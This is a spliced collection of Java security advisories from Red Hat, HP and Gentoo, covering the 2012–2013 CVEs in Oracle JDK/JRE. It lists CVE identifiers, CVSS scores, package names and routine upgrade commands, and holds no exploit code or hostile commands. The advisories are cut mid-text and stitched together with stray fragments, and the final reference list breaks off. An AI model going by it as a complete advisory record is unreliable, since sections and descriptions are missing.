The vulnerability can be exploited over multiple protocols. This issue affects the 'Deployment' sub-component.
This vulnerability affects the following supported versions:
7 Update 7, 6 Update 35. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: java-1.6.0-sun security update
Advisory ID: RHSA-2012:1392-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-1392.html
Issue date: 2012-10-18
CVE Names: CVE-2012-0547 CVE-2012-1531 CVE-2012-1532
CVE-2012-1533 CVE-2012-3143 CVE-2012-3159
CVE-2012-3216 CVE-2012-4416 CVE-2012-5068
CVE-2012-5069 CVE-2012-5071 CVE-2012-5072
CVE-2012-5073 CVE-2012-5075 CVE-2012-5077
CVE-2012-5079 CVE-2012-5081 CVE-2012-5083
CVE-2012-5084 CVE-2012-5085 CVE-2012-5086
CVE-2012-5089
=====================================================================
1. Summary:
Updated java-1.6.0-sun packages that fix several security issues are now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Further
information about these flaws can be found on the Oracle Java SE Critical
Patch Update Advisory and Oracle Security Alert pages, listed in the
References section. (CVE-2012-0547, CVE-2012-1531, CVE-2012-1532,
CVE-2012-1533, CVE-2012-3143, CVE-2012-3159, CVE-2012-3216, CVE-2012-4416,
CVE-2012-5068, CVE-2012-5069, CVE-2012-5071, CVE-2012-5072, CVE-2012-5073,
CVE-2012-5075, CVE-2012-5077, CVE-2012-5079, CVE-2012-5081, CVE-2012-5083,
CVE-2012-5084, CVE-2012-5085, CVE-2012-5086, CVE-2012-5089)
All users of java-1.6.0-sun are advised to upgrade to these updated
packages, which provide Oracle Java 6 Update 37. All running instances of
Oracle Java must be restarted for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
853228 - CVE-2012-0547 OpenJDK: AWT hardening fixes (AWT, 7163201)
856124 - CVE-2012-4416 OpenJDK: uninitialized Array JVM memory disclosure (Hotspot, 7198606)
865346 - CVE-2012-3216 OpenJDK: java.io.FilePermission information leak (Libraries, 6631398)
865348 - CVE-2012-5068 OpenJDK: RhinoScriptEngine security bypass (Scripting, 7143535)
865354 - CVE-2012-5077 OpenJDK: SecureRandom mulitple seeders information disclosure (Security, 7167656)
865357 - CVE-2012-5073 OpenJDK: LogManager security bypass (Libraries, 7169884)
865363 - CVE-2012-5075 OpenJDK: RMIConnectionImpl information disclosure (JMX, 7169888)
865365 - CVE-2012-5072 OpenJDK: AccessController.doPrivilegedWithCombiner() information disclosure (Security, 7172522)
865370 - CVE-2012-5081 OpenJDK: JSSE denial of service (JSSE, 7186286)
865428 - CVE-2012-5086 OpenJDK: XMLDecoder sandbox restriction bypass (Beans, 7195917)
865511 - CVE-2012-5084 OpenJDK: DefaultFormatter insufficient data validation (Swing, 7195194)
865514 - CVE-2012-5089 OpenJDK: RMIConnectionImpl insufficient access control checks (JMX, 7198296)
865519 - CVE-2012-5071 OpenJDK: DescriptorSupport insufficient package access checks (JMX, 7192975)
865531 - CVE-2012-5069 OpenJDK: Executors state handling issues (Concurrency, 7189103)
865541 - CVE-2012-5085 OpenJDK: disable Gopher support by default (Gopher, 7189567)
865568 - CVE-2012-5079 OpenJDK: ServiceLoader reject not subtype classes without instantiating (Libraries, 7195919)
867185 - CVE-2012-1531 Oracle JDK: unspecified vulnerability (2D)
867186 - CVE-2012-1532 Oracle JDK: unspecified vulnerability (Deployment)
867187 - CVE-2012-1533 Oracle JDK: unspecified vulnerability (Deployment)
867189 - CVE-2012-3143 Oracle JDK: unspecified vulnerability (JMX)
867190 - CVE-2012-3159 Oracle JDK: unspecified vulnerability (Deployment)
867193 - CVE-2012-5083 Oracle JDK: unspecified vulnerability (2D)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
java-1.6.0-sun-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-demo-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-plugin-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-src-1.6.0.37-1jpp.1.el5_8.i586.rpm
x86_64:
java-1.6.0-sun-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-1.6.0.37-1jpp.1.el5_8.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-demo-1.6.0.37-1jpp.1.el5_8.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el5_8.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.37-1jpp.1.el5_8.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-plugin-1.6.0.37-1jpp.1.el5_8.x86_64.rpm
java-1.6.0-sun-src-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-src-1.6.0.37-1jpp.1.el5_8.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
java-1.6.0-sun-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-demo-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-plugin-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-src-1.6.0.37-1jpp.1.el5_8.i586.rpm
x86_64:
java-1.6.0-sun-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-1.6.0.37-1jpp.1.el5_8.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-demo-1.6.0.37-1jpp.1.el5_8.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el5_8.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.37-1jpp.1.el5_8.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-plugin-1.6.0.37-1jpp.1.el5_8.x86_64.rpm
java-1.6.0-sun-src-1.6.0.37-1jpp.1.el5_8.i586.rpm
java-1.6.0-sun-src-1.6.0.37-1jpp.1.el5_8.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-demo-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-plugin-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-src-1.6.0.37-1jpp.1.el6_3.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64:
java-1.6.0-sun-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-demo-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-plugin-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-src-1.6.0.37-1jpp.1.el6_3.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-demo-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-plugin-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-src-1.6.0.37-1jpp.1.el6_3.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.37-1jpp.1.el6_3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-0547.html
https://www.redhat.com/security/data/cve/CVE-2012-1531.html
https://www.redhat.com/security/data/cve/CVE-2012-1532.html
https://www.redhat.com/security/data/cve/CVE-2012-1533.html
https://www.redhat.com/security/data/cve/CVE-2012-3143.html
https://www.redhat.com/security/data/cve/CVE-2012-3159.html
https://www.redhat.com/security/data/cve/CVE-2012-3216.html
https://www.redhat.com/security/data/cve/CVE-2012-4416.html
https://www.redhat.com/security/data/cve/CVE-2012-5068.html
https://www.redhat.com/security/data/cve/CVE-2012-5069.html
https://www.redhat.com/security/data/cve/CVE-2012-5071.html
https://www.redhat.com/security/data/cve/CVE-2012-5072.html
https://www.redhat.com/security/data/cve/CVE-2012-5073.html
https://www.redhat.com/security/data/cve/CVE-2012-5075.html
https://www.redhat.com/security/data/cve/CVE-2012-5077.html
https://www.redhat.com/security/data/cve/CVE-2012-5079.html
https://www.redhat.com/security/data/cve/CVE-2012-5081.html
https://www.redhat.com/security/data/cve/CVE-2012-5083.html
https://www.redhat.com/security/data/cve/CVE-2012-5084.html
https://www.redhat.com/security/data/cve/CVE-2012-5085.html
https://www.redhat.com/security/data/cve/CVE-2012-5086.html
https://www.redhat.com/security/data/cve/CVE-2012-5089.html
https://access.redhat.com/security/updates/classification/#critical
http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html
http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFQgDWiXlSAg2UNWIIRAqJaAJ9JgbhUTiBVnoxljsrFIdgNbno3bACgu3Yu
2L/xJjdCuObuBeSubEBbjpo=
=p6Cl
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. In a typical operating environment, these are of low security risk as
the runtime is not used on untrusted applets. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03596813
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03596813
Version: 1
HPSBOV02833 SSRT101043 rev.1 - OpenVMS running Java on Integrity Servers,
Remote Unauthorized Access, Disclosure of Information, and Other
Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible. These vulnerabilities could allow remote unauthorized access,
disclosure of information, and other exploits.
OpenVMS Integrity JDK and JRE 6.0-3.p1 and earlier.
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-1531 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-1532 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-1533 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3143 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3159 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2012-3216 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6
CVE-2012-4416 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2012-5068 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2012-5069 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8
CVE-2012-5071 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2012-5072 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2012-5073 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2012-5075 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2012-5077 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6
CVE-2012-5079 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2012-5081 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2012-5083 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-5084 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2012-5085 (AV:N/AC:M/Au:S/C:N/I:N/A:N) 0.0
CVE-2012-5086 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-5087 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-5089 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has made the following software updates available to resolve these
vulnerabilities.
The updates are available from the following location:
http://h18012.www1.hp.com/java/alpha
Kit Name
Java SE Development Kit (JDK) 6.0-4 for the OpenVMS I64 Operating System
Java SE Runtime Environment (JRE) 6.0-4 for the OpenVMS I64 Operating System
HISTORY
Version:1 (rev.1) - 7 January 2013 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Oracle JRE/JDK: Multiple vulnerabilities
Date: January 27, 2014
Bugs: #404071, #421073, #433094, #438706, #451206, #455174,
#458444, #460360, #466212, #473830, #473980, #488210, #498148
ID: 201401-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in the Oracle JRE/JDK,
allowing attackers to cause unspecified impact.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/sun-jdk <= 1.6.0.45 Vulnerable!
2 dev-java/oracle-jdk-bin < 1.7.0.51 >= 1.7.0.51 *
3 dev-java/sun-jre-bin <= 1.6.0.45 Vulnerable!
4 dev-java/oracle-jre-bin < 1.7.0.51 >= 1.7.0.51 *
5 app-emulation/emul-linux-x86-java
< 1.7.0.51 >= 1.7.0.51 *
-------------------------------------------------------------------
NOTE: Certain packages are still vulnerable. Users should migrate
to another package if one is available or wait for the
existing packages to be marked stable by their
architecture maintainers.
-------------------------------------------------------------------
NOTE: Packages marked with asterisks require manual intervention!
-------------------------------------------------------------------
5 affected packages
Description
===========
Multiple vulnerabilities have been reported in the Oracle Java
implementation. Please review the CVE identifiers referenced below for
details.
Impact
======
An unauthenticated, remote attacker could exploit these vulnerabilities
to execute arbitrary code.
Furthermore, a local or remote attacker could exploit these
vulnerabilities to cause unspecified impact, possibly including remote
execution of arbitrary code.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.51"
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.51"
All users of the precompiled 32-bit Oracle JRE should upgrade to the
latest version:
# emerge --sync
# emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.51"
All Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one
of the newer Oracle packages like dev-java/oracle-jdk-bin or
dev-java/oracle-jre-bin or choose another alternative we provide; eg.
the IBM JDK/JRE or the open source IcedTea.
References
==========
[ 1 ] CVE-2011-3563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563
[ 2 ] CVE-2011-5035
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035
[ 3 ] CVE-2012-0497
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497
[ 4 ] CVE-2012-0498
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0498
[ 5 ] CVE-2012-0499
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0499
[ 6 ] CVE-2012-0500
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0500
[ 7 ] CVE-2012-0501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501
[ 8 ] CVE-2012-0502
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502
[ 9 ] CVE-2012-0503
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503
[ 10 ] CVE-2012-0504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0504
[ 11 ] CVE-2012-0505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505
[ 12 ] CVE-2012-0506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506
[ 13 ] CVE-2012-0507
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0507
[ 14 ] CVE-2012-0547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547
[ 15 ] CVE-2012-1531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1531
[ 16 ] CVE-2012-1532
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1532
[ 17 ] CVE-2012-1533
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1533
[ 18 ] CVE-2012-1541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1541
[ 19 ] CVE-2012-1682
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1682
[ 20 ] CVE-2012-1711
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711
[ 21 ] CVE-2012-1713
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713
[ 22 ] CVE-2012-1716
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716
[ 23 ] CVE-2012-1717
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717
[ 24 ] CVE-2012-1718
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718
[ 25 ] CVE-2012-1719
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719
[ 26 ] CVE-2012-1721
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1721
[ 27 ] CVE-2012-1722
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1722
[ 28 ] CVE-2012-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723
[ 29 ] CVE-2012-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724
[ 30 ] CVE-2012-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725
[ 31 ] CVE-2012-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726
[ 32 ] CVE-2012-3136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3136
[ 33 ] CVE-2012-3143
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3143
[ 34 ] CVE-2012-3159
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3159
[ 35 ] CVE-2012-3174
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3174
[ 36 ] CVE-2012-3213
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3213
[ 37 ] CVE-2012-3216
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216
[ 38 ] CVE-2012-3342
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3342
[ 39 ] CVE-2012-4416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416
[ 40 ] CVE-2012-4681
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4681
[ 41 ] CVE-2012-5067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5067
[ 42 ] CVE-2012-5068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068
[ 43 ] CVE-2012-5069
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069
[ 44 ] CVE-2012-5070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070
[ 45 ] CVE-2012-5071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071
[ 46 ] CVE-2012-5072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072
[ 47 ] CVE-2012-5073
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073
[ 48 ] CVE-2012-5074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074
[ 49 ] CVE-2012-5075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075
[ 50 ] CVE-2012-5076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076
[ 51 ] CVE-2012-5077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077
[ 52 ] CVE-2012-5079
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5079
[ 53 ] CVE-2012-5081
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081
[ 54 ] CVE-2012-5083
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5083
[ 55 ] CVE-2012-5084
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084
[ 56 ] CVE-2012-5085
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085
[ 57 ] CVE-2012-5086
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086
[ 58 ] CVE-2012-5087
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087
[ 59 ] CVE-2012-5088
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5088
[ 60 ] CVE-2012-5089
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089
[ 61 ] CVE-2013-0169
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169
[ 62 ] CVE-2013-0351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0351
[ 63 ] CVE-2013-0401
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401
[ 64 ] CVE-2013-0402
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0402
[ 65 ] CVE-2013-0409
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0409
[ 66 ] CVE-2013-0419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0419
[ 67 ] CVE-2013-0422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0422
[ 68 ] CVE-2013-0423
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0423
[ 69 ] CVE-2013-0430
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0430
[ 70 ] CVE-2013-0437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0437
[ 71 ] CVE-2013-0438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0438
[ 72 ] CVE-2013-0445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0445
[ 73 ] CVE-2013-0446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0446
[ 74 ] CVE-2013-0448
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0448
[ 75 ] CVE-2013-0449
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0449
[ 76 ] CVE-2013-0809
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809
[ 77 ] CVE-2013-1473
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1473
[ 78 ] CVE-2013-1479
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1479
[ 79 ] CVE-2013-1481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1481
[ 80 ] CVE-2013-1484
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484
[ 81 ] CVE-2013-1485
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485
[ 82 ] CVE-2013-1486
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486
[ 83 ] CVE-2013-1487
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1487
[ 84 ] CVE-2013-1488
